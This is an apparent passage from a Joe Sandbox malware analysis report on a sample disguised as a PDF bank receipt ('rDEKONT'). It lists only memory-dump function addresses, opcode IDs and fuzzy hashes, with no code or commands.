                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d4598d52a98febcd6287b9c053c11d1304be5d2fdbf5f98f803dba0f83ff742f
                                                                                                                                                          • Instruction ID: aa1970cec5636b85cb2c94cc5a05b09ff3b26fa0983278e2491e1bcb7ee4395d
                                                                                                                                                          • Opcode Fuzzy Hash: d4598d52a98febcd6287b9c053c11d1304be5d2fdbf5f98f803dba0f83ff742f
                                                                                                                                                          • Instruction Fuzzy Hash: 3741DDB0D10319DFCB14CF9AC984A9EFBB5BF88310F20822AE419AB364D7756945CF90
                                                                                                                                                          Function 0B8486F0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 115f56640204c4b2c69dee9d1e4c73e30cee96efb2d68d6653021ec572e708aa
                                                                                                                                                          • Instruction ID: e44398ecf1f0d5faa68cb4c5a4ddeac4cc931b046f103f3702d12f05c0c0dafa
                                                                                                                                                          • Opcode Fuzzy Hash: 115f56640204c4b2c69dee9d1e4c73e30cee96efb2d68d6653021ec572e708aa
                                                                                                                                                          • Instruction Fuzzy Hash: DC313474E0520EDFCB44CFAAD5955AEBBF2EB88310F20D4AAD415E7260E7389A41CF51
                                                                                                                                                          Function 0B848700 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 29238882f6d4edea2563c9b6c4fbd908e11cb1f2f5b3cfaa56d5f7c613c0a002
                                                                                                                                                          • Instruction ID: e3dde0b450376ebf60195a2742ad673d199842ef355fd31f7016523bb42c4f32
                                                                                                                                                          • Opcode Fuzzy Hash: 29238882f6d4edea2563c9b6c4fbd908e11cb1f2f5b3cfaa56d5f7c613c0a002
                                                                                                                                                          • Instruction Fuzzy Hash: BA310574E0520EDFCB44CFA9D5955AEBBF2AB88310F20D46AD415E7360EB349A41CF51
                                                                                                                                                          Function 0B8467C8 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ac11dc4b06217586aad1e986a7d33d1579cd51523436775a6632c5c9bbda7c78
                                                                                                                                                          • Instruction ID: 415a5c0a09b0195f469c7af3a08e658d78983a0806a56c0e21166155a77cad52
                                                                                                                                                          • Opcode Fuzzy Hash: ac11dc4b06217586aad1e986a7d33d1579cd51523436775a6632c5c9bbda7c78
                                                                                                                                                          • Instruction Fuzzy Hash: 40310774E0521E9FCB04CFA9D4455AEBBB2FF89310F14846AE915E7364EB349A41CF50
                                                                                                                                                          Function 0B8467D8 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d75497892d07c8f5f1fac5edb1f20ba4eb27ea86383ee0e5977400a6bd1c029c
                                                                                                                                                          • Instruction ID: 080091b058be7eda5b4248feea0cfc009df34cb92c81da1539e1f681ed147274
                                                                                                                                                          • Opcode Fuzzy Hash: d75497892d07c8f5f1fac5edb1f20ba4eb27ea86383ee0e5977400a6bd1c029c
                                                                                                                                                          • Instruction Fuzzy Hash: 1A31F374E0121E9FDB08CFA9D4855AEBBB6FF89310F10846AE925E7364EB349941CF50
                                                                                                                                                          Function 056FBD48 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 47d04a903562dc783d6463f309619a14d19f773b8b020963bd267c85a2e70966
                                                                                                                                                          • Instruction ID: 04b2ebfeb31e69d5cad7ca5c7080e04a22fa906feff4ea618107392a4021141e
                                                                                                                                                          • Opcode Fuzzy Hash: 47d04a903562dc783d6463f309619a14d19f773b8b020963bd267c85a2e70966
                                                                                                                                                          • Instruction Fuzzy Hash: 8121AF36B446008FCB18EB3DD4189AE77EAEF8866171540AADA06CB370DE31DC41CBA1
                                                                                                                                                          Function 056FEF48 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 79d518c116f270812bdeccbd0806dcc55fc9b9038a069daf0c71e620f81d98c0
                                                                                                                                                          • Instruction ID: 1a42803d9d9a38c9976766932aa6dba0e65840422d2bea8c478bbe3f8c52d3d9
                                                                                                                                                          • Opcode Fuzzy Hash: 79d518c116f270812bdeccbd0806dcc55fc9b9038a069daf0c71e620f81d98c0
                                                                                                                                                          • Instruction Fuzzy Hash: 9F317A35A05218AFCB04CFA9E844EDDFFF6FF48310F1480AAE505AB261D7729945CBA0
                                                                                                                                                          Function 056FB5C1 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9edad8e7f696f9725a0721a6cbd6c5ca81bd2fa8726950d5614ed2c1aabdee94
                                                                                                                                                          • Instruction ID: b49399f5869754deda1c727654ba036f8dc927addb29156106c49f2633066375
                                                                                                                                                          • Opcode Fuzzy Hash: 9edad8e7f696f9725a0721a6cbd6c5ca81bd2fa8726950d5614ed2c1aabdee94
                                                                                                                                                          • Instruction Fuzzy Hash: 7A21B0303046118FCB15DB39C824E29B7E6BF85714B1480AEE646CB7B0CB72DC82CB50
                                                                                                                                                          Function 015FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723193326.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_15fd000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                          • Instruction ID: 9c20833efb79a3ae4f67dcdd78c723d3f9cee2a8698d64a1fab6ed12178943d9
                                                                                                                                                          • Opcode Fuzzy Hash: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                          • Instruction Fuzzy Hash: B72100B1500240DFDB05DF98D9C8B2ABFB5FB88318F20C56DEA090F256C336D456CAA2
                                                                                                                                                          Function 0160D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723254561.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_160d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7390d4a89685207b4416a7afefc0501ee89a0cd762739f8c2f112b78c90157aa
                                                                                                                                                          • Instruction ID: a0bf20bcd89facabe47f861d2b8353896b97ad7092d7fdab0218433a554ff62f
                                                                                                                                                          • Opcode Fuzzy Hash: 7390d4a89685207b4416a7afefc0501ee89a0cd762739f8c2f112b78c90157aa
                                                                                                                                                          • Instruction Fuzzy Hash: 15210771504200EFDB0ADFD8D9C0B27BBA5FB84324F20C66DEA094B396C376D446CA61
                                                                                                                                                          Function 0160D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723254561.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_160d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                          • Instruction ID: 0a16a1a4de45bf73214af977c28473af819d825d58e3f2a8e5ca0779ddab8180
                                                                                                                                                          • Opcode Fuzzy Hash: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                          • Instruction Fuzzy Hash: A621F271604200DFDB1ADF98D984B27BFA5EB84354F20C66DD94E4B396C33AD447CA61
                                                                                                                                                          Function 056FB5D0 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dca634253311a551f72da5f11b4c47ab988220de5f18bf7ea7d4f93dfd127b9a
                                                                                                                                                          • Instruction ID: d0c9c96c1998ee9e1ce1edc701d5e15b68a038ab5180a30272cb663210e10b82
                                                                                                                                                          • Opcode Fuzzy Hash: dca634253311a551f72da5f11b4c47ab988220de5f18bf7ea7d4f93dfd127b9a
                                                                                                                                                          • Instruction Fuzzy Hash: 6B212C307106118FCB18EB29C864E2A77EABF85615B14846DE64ACB774DB72DC86CB50
                                                                                                                                                          Function 0B8415A9 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a5980c012c8c2534ff87721d4120028b290816273551a8fa24193a59c7a94c2c
                                                                                                                                                          • Instruction ID: 65f49186137c86695fde715f9d0f642bd9c978dd5eff861aa334de51941f7240
                                                                                                                                                          • Opcode Fuzzy Hash: a5980c012c8c2534ff87721d4120028b290816273551a8fa24193a59c7a94c2c
                                                                                                                                                          • Instruction Fuzzy Hash: 3931A3B4E1420ADFCB48DFA9C58599EBBF2BF89310F14C5AAD415E7224E730DA418F51
                                                                                                                                                          Function 0B8415B8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc5a56ec8d2c3e80ac22c5a0e41f77c37171956557280bb09c055bf0371aff1f
                                                                                                                                                          • Instruction ID: 8ce7c6601eaa9dc5ab568b7533be5b0905d353560d34ac3922de39b7e9f0b972
                                                                                                                                                          • Opcode Fuzzy Hash: fc5a56ec8d2c3e80ac22c5a0e41f77c37171956557280bb09c055bf0371aff1f
                                                                                                                                                          • Instruction Fuzzy Hash: 0C21D6B4E0420EDFCB44DFA9C5859AEBBF2BB89300F15C5AA9419E7324E730DA418F51
                                                                                                                                                          Function 056FE90C Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a43464ddf597c5b0a2749e9c89cc59dc7d6208bb82e5bfd8a8ca0dde37f173eb
                                                                                                                                                          • Instruction ID: 488b4083d97c41488a53148564304f791eca8ee259db77140c285a7e413153e5
                                                                                                                                                          • Opcode Fuzzy Hash: a43464ddf597c5b0a2749e9c89cc59dc7d6208bb82e5bfd8a8ca0dde37f173eb
                                                                                                                                                          • Instruction Fuzzy Hash: BF21C635F402068FDF05DFA8C9805FEBBB7BF89210B18452AD505A72A4EB359E41CBA1
                                                                                                                                                          Function 0B843088 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0a3abd37430126ec80f92debbed74e4a691820e0aa457dfe126df2e77cbb36f4
                                                                                                                                                          • Instruction ID: bf729eb59e914fe3cc595d1a0a726c9b1bf8a1ab7b62866117d1e6991cd08202
                                                                                                                                                          • Opcode Fuzzy Hash: 0a3abd37430126ec80f92debbed74e4a691820e0aa457dfe126df2e77cbb36f4
                                                                                                                                                          • Instruction Fuzzy Hash: 3B212670E0420ADFDB04CFA9C5416AEFBF1BF8A200F1481AA9415E7264E7709A418B55
                                                                                                                                                          Function 0B84B708 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b4a870922b8d45cf44d7a8567373a31c75565f4b89b46b753556b088d2d621f5
                                                                                                                                                          • Instruction ID: 704a6a79b32a229586686220913e68fbc12606730ecab53917171efc503e52d9
                                                                                                                                                          • Opcode Fuzzy Hash: b4a870922b8d45cf44d7a8567373a31c75565f4b89b46b753556b088d2d621f5
                                                                                                                                                          • Instruction Fuzzy Hash: F021E7B8D0820DDFCB44CFA9C1809AEBBF5EB49314F2090A5D919E7721D3709A41DF61
                                                                                                                                                          Function 056FD2C0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8f7cada0de77df604b49bf53727caadf0b9af747491d3cfe088e2b2d38fa243
                                                                                                                                                          • Instruction ID: b5ff351a261983bd64b4b9320b2f6494b49bd49e9a006426f301740bff644622
                                                                                                                                                          • Opcode Fuzzy Hash: f8f7cada0de77df604b49bf53727caadf0b9af747491d3cfe088e2b2d38fa243
                                                                                                                                                          • Instruction Fuzzy Hash: C52137B6C043499FCB20CF99D944ADEBFF4EB49320F00805AE954A7211C379A945CFA1
                                                                                                                                                          Function 0B84E56E Relevance: .1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d377590b3c7813d5f1df9ea784ba80921e592c742c8f0f5e1ad7abc141d9b6c
                                                                                                                                                          • Instruction ID: aa32ed716c05841ae8eab337dbf5966441e55bb378af5bfd87102b14532685ce
                                                                                                                                                          • Opcode Fuzzy Hash: 5d377590b3c7813d5f1df9ea784ba80921e592c742c8f0f5e1ad7abc141d9b6c
                                                                                                                                                          • Instruction Fuzzy Hash: 54213C70E01348CFC708DFA4D5586ADBBBAFB99705B109128D82AEB369DB309C42CF51
                                                                                                                                                          Function 0B843098 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f2d1eb286488cc92101334acca502004e0668b3a1bc24dc68d1cecc639f7c258
                                                                                                                                                          • Instruction ID: c66d346c054574e536e9e8f78e0c9c3b8321a2578912605c64aef7ce146e8e6e
                                                                                                                                                          • Opcode Fuzzy Hash: f2d1eb286488cc92101334acca502004e0668b3a1bc24dc68d1cecc639f7c258
                                                                                                                                                          • Instruction Fuzzy Hash: F82107B0E0420EDFDB44CFA9C5415AEFBF1BF89200F10D5AA9414A7264E7709B008F95
                                                                                                                                                          Function 0B848610 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a61856c5d29624c83c80407639e4b8ad3f35545b9f7d28679fc7724165ecbed8
                                                                                                                                                          • Instruction ID: 40eeef87770defc58977949913457d7369b306b571fe9f8260bd607ed832fb50
                                                                                                                                                          • Opcode Fuzzy Hash: a61856c5d29624c83c80407639e4b8ad3f35545b9f7d28679fc7724165ecbed8
                                                                                                                                                          • Instruction Fuzzy Hash: 90214774E0520EEFCB44CFA8E4951ADBFF1AB89310F2085AAD809E7354E7349A41DB52
                                                                                                                                                          Function 0B848490 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8d49a4856d2d573173ac5f3dd32ad487d6758f2b048e59f4422fc9a90636adfe
                                                                                                                                                          • Instruction ID: a9f6c437c722ffcac03b45b04139bf32ab42d0f3cd4cab3ad0f72aa921335cde
                                                                                                                                                          • Opcode Fuzzy Hash: 8d49a4856d2d573173ac5f3dd32ad487d6758f2b048e59f4422fc9a90636adfe
                                                                                                                                                          • Instruction Fuzzy Hash: FF2129B4E0521ADFCB44DFA9D9415AEBBF2FF89210F1484AAC419E7364E7309A00CB61
                                                                                                                                                          Function 0160D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723254561.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_160d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                          • Instruction ID: 71753c6a7fa1eb688280027d5117c41792202db6d0de4875dff435ecc23bf5ce
                                                                                                                                                          • Opcode Fuzzy Hash: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                          • Instruction Fuzzy Hash: 7421A4755093808FDB07CF64D994716BF71EB46214F28C6DAD8498F6A7C33A980ACB62
                                                                                                                                                          Function 0B84C65B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8342607ef5cae926232d3302c7a0fa6730b263f0349a55e975fc93e200b01bde
                                                                                                                                                          • Instruction ID: 53096323fd75d3451bb1adcdc4b46ea376a0609d9f7458c737ffcb94da162a48
                                                                                                                                                          • Opcode Fuzzy Hash: 8342607ef5cae926232d3302c7a0fa6730b263f0349a55e975fc93e200b01bde
                                                                                                                                                          • Instruction Fuzzy Hash: 8C214F74D09398DFC705CF69C8545AEBFB6AF8A300F05C0AAE855EB262C7345945CF51
                                                                                                                                                          Function 056FB739 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8f41a78fb6b04be080c22793696c3426540629cd151d1d5f3ddb7eda03c65b1
                                                                                                                                                          • Instruction ID: 6582237139bde0d18db0c1f2d97074d88504fa78c9897913bce8926364f21c18
                                                                                                                                                          • Opcode Fuzzy Hash: f8f41a78fb6b04be080c22793696c3426540629cd151d1d5f3ddb7eda03c65b1
                                                                                                                                                          • Instruction Fuzzy Hash: 3811CEB17083549FC749AF78C85452E7FFAEF8A210711847AE90ACB3A1EE358C15CB95
                                                                                                                                                          Function 0B84B718 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 98be7f83e609c28b0faa05644f7a9b85dee201423364c84e2490960210aecec3
                                                                                                                                                          • Instruction ID: c4510b78d7d7c2344c818d52a5a4063cca08f09f92ef9085092f74396b39152c
                                                                                                                                                          • Opcode Fuzzy Hash: 98be7f83e609c28b0faa05644f7a9b85dee201423364c84e2490960210aecec3
                                                                                                                                                          • Instruction Fuzzy Hash: 4821B7B8E0820DDFCB84DFA9C1809AEBBF5EB49314F609095D919E7721D7309A41CF61
                                                                                                                                                          Function 0B84E615 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 30e7ba49e97c4d0082771ada16b12eceaa26c7effb1067e9879eb1c2a1421ab4
                                                                                                                                                          • Instruction ID: aa34e42177e49cc0ee09300567d695ad905fc6af234414a84460ac606b4d1715
                                                                                                                                                          • Opcode Fuzzy Hash: 30e7ba49e97c4d0082771ada16b12eceaa26c7effb1067e9879eb1c2a1421ab4
